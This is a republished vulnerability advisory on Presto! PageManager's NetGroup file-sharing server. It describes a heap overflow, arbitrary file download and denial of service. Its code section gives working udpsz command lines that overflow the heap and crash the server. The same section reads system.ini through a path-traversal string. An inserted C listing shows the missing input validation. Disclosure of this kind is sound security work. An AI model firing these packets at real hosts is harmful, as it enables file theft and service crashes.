presto! pagemanager <= 9.01 - Multiple Vulnerabilities

Published 01 Jul 2014, reported by RootType (seebug, www.seebug.org)

Presto! PageManager <= 9.01 - Multiple Vulnerabilities including heap overflow, arbitrary file download and denial of service

#######################################################################

                             Luigi Auriemma

Application:  Presto! PageManager
              http://www.newsoftinc.com/products/product_page.php?P_Id=5
Versions:     <= 9.01
Platforms:    Windows, MacOSX
Bugs:         A] Heap-overflow
              B] Arbitrary files downloading
              C] Denial of Service
Exploitation: remote
Date:         14 Mar 2012
Author:       Luigi Auriemma
              e-mail: [email protected]
              web:    aluigi.org


#######################################################################


1) Introduction
2) Bugs
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


Presto! PageManager is management software for scanners and is also
shipped by default by some hardware vendors (such as Epson).

It is bundled with a (manual) server program called NetGroup for remote
file transfer:
"The Network Group function helps you exchange files with your group
members. Everyone in the working group should have Presto! PageManager
running."


#######################################################################

=======
2) Bugs
=======

----------------
A] Heap-overflow
----------------

Heap-based buffer overflow on port 2502 while copying the message string
into a small heap buffer (the copy length comes from strlen() of the
attacker-controlled data, not from the size of the destination):

  004151BE  |. 33C0           XOR EAX,EAX
  004151C0  |. F2:AE          REPNE SCAS BYTE PTR ES:[EDI]  ; strlen
  004151C2  |. F7D1           NOT ECX
  004151C4  |. 2BF9           SUB EDI,ECX
  004151C6  |. 6A FF          PUSH -1
  004151C8  |. 8BC1           MOV EAX,ECX
  004151CA  |. 8BF7           MOV ESI,EDI
  004151CC  |. 8BFA           MOV EDI,EDX
  004151CE  |. C1E9 02        SHR ECX,2                     ; heap overflow
  004151D1  |. F3:A5          REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]
  004151D3  |. 8BC8           MOV ECX,EAX
  004151D5  |. 83E1 03        AND ECX,3
  004151D8  |. F3:A4          REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI]
  004151DA  |. 8D4C24 14      LEA ECX,DWORD PTR SS:[ESP+14]
  004151DE  |. E8 1B370000    CALL <JMP.&MFC42.#5572>
  004151E3  |. 8B5424 10      MOV EDX,DWORD PTR SS:[ESP+10]
  004151E7  |. 8D4C24 2C      LEA ECX,DWORD PTR SS:[ESP+2C]
  004151EB  |. 51             PUSH ECX
  004151EC  |. 52             PUSH EDX
  004151ED  |. E8 56350000    CALL <JMP.&PMCommon._GetFileExtName>
  004151F2  |. BE 94014200    MOV ESI,NetGroup.00420194     ;  ASCII ".NSOFT"


------------------------------
B] Arbitrary files downloading
------------------------------

The server lets a client download any file from the host, not only
those in the shared folder.


--------------------
C] Denial of Service
--------------------

A simple self-termination of the server, caused by the failure to
allocate the amount of memory specified by the client.

There is also a "division by zero" when specifying a file size of 0
bytes.
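The three bugs share one root cause: fields taken from the client are used as a copy length, a file path and an allocation size without validation. The following C listing is an added example (not NetGroup's code and not the author's test code) of the checks a receiver needs; the message layout it assumes (a 4-byte little-endian size followed by a NUL-terminated file name) is a constructed assumption, not the real NetGroup protocol.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Added example, not NetGroup's code. The layout (4-byte little-endian size,
 * then a NUL-terminated file name) is a constructed assumption; the point is
 * the checks the listing above lacks: the copy length comes from strlen() of
 * the input while the destination is a small fixed heap buffer (A), the name
 * is used as a path without confinement (B), and the size is trusted for an
 * allocation and a later division (C). */

#define NAME_BUF  64            /* fixed destination, like the small heap buffer */
#define MAX_ALLOC (16u << 20)   /* cap for a client-requested allocation */

enum { OK = 0, ERR_SHORT = -1, ERR_TOOLONG = -2, ERR_BADSIZE = -3, ERR_PATH = -4 };

/* B: a shared-folder name must be a plain file name, not a path. */
static int name_is_confined(const char *s) {
    if (*s == '\0' || strcmp(s, ".") == 0 || strcmp(s, "..") == 0) return 0;
    if (strchr(s, '/') || strchr(s, '\\') || strchr(s, ':')) return 0;
    return 1;
}

/* Validate one request before any allocation or copy takes place. */
int parse_request(const uint8_t *buf, size_t len, uint32_t *size_out, char *name_out) {
    if (len < 4) return ERR_SHORT;
    uint32_t size = (uint32_t)buf[0] | (uint32_t)buf[1] << 8 |
                    (uint32_t)buf[2] << 16 | (uint32_t)buf[3] << 24;
    /* C: zero would feed the division, a huge value kills the allocation. */
    if (size == 0 || size > MAX_ALLOC) return ERR_BADSIZE;

    /* A: look for the terminator only inside the datagram, never past it. */
    const uint8_t *p = buf + 4;
    const uint8_t *end = memchr(p, '\0', len - 4);
    if (end == NULL) return ERR_SHORT;
    size_t n = (size_t)(end - p);
    if (n >= NAME_BUF) return ERR_TOOLONG;   /* would overflow the fixed buffer */
    memcpy(name_out, p, n + 1);              /* bounded copy, terminator included */

    if (!name_is_confined(name_out)) return ERR_PATH;
    *size_out = size;
    return OK;
}

/* C: allocate only after validation, so a rejected size never reaches malloc. */
void *alloc_transfer_buffer(uint32_t size) {
    return (size == 0 || size > MAX_ALLOC) ? NULL : malloc(size);
}
```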


#######################################################################

===========
3) The Code
===========


http://aluigi.org/testz/udpsz.zip
http://www.exploit-db.com/sploits/18600.zip

A]
  udpsz -T -C "00000100 ffff0200" 0 -b a -C "00 00 1000000000000000 00" -1 SERVER 2502 8+0x02ffff
  just a quick test; there are better ways that show code execution

B]
  udpsz -D -3 -T -c "\x00\x00\x01\x00\x15\x00\x00\x00myblah\0file\0\x01" 0 -c "\x00\x00\x02\x00\x00\x01\x00\x00c:\\windows\\system.ini" 0x1d -C "00002000 00000000" -1 SERVER 2502 8+0x15+8+0x100+8
  or
  udpsz -D -3 -T -c "\x00\x00\x01\x00\x15\x00\x00\x00myblah\0file\0\x01" 0 -c "\x00\x00\x02\x00\x00\x01\x00\x00../../../../windows/system.ini" 0x1d -C "00002000 00000000" -1 SERVER 2502 8+0x15+8+0x100+8

C]
  udpsz -T -C "00010000 ffffffff" SERVER 2501 -1
  or
  udpsz -T -C "00000100 ffffffff" SERVER 2502 -1


#######################################################################

======
4) Fix
======


No fix.


#######################################################################
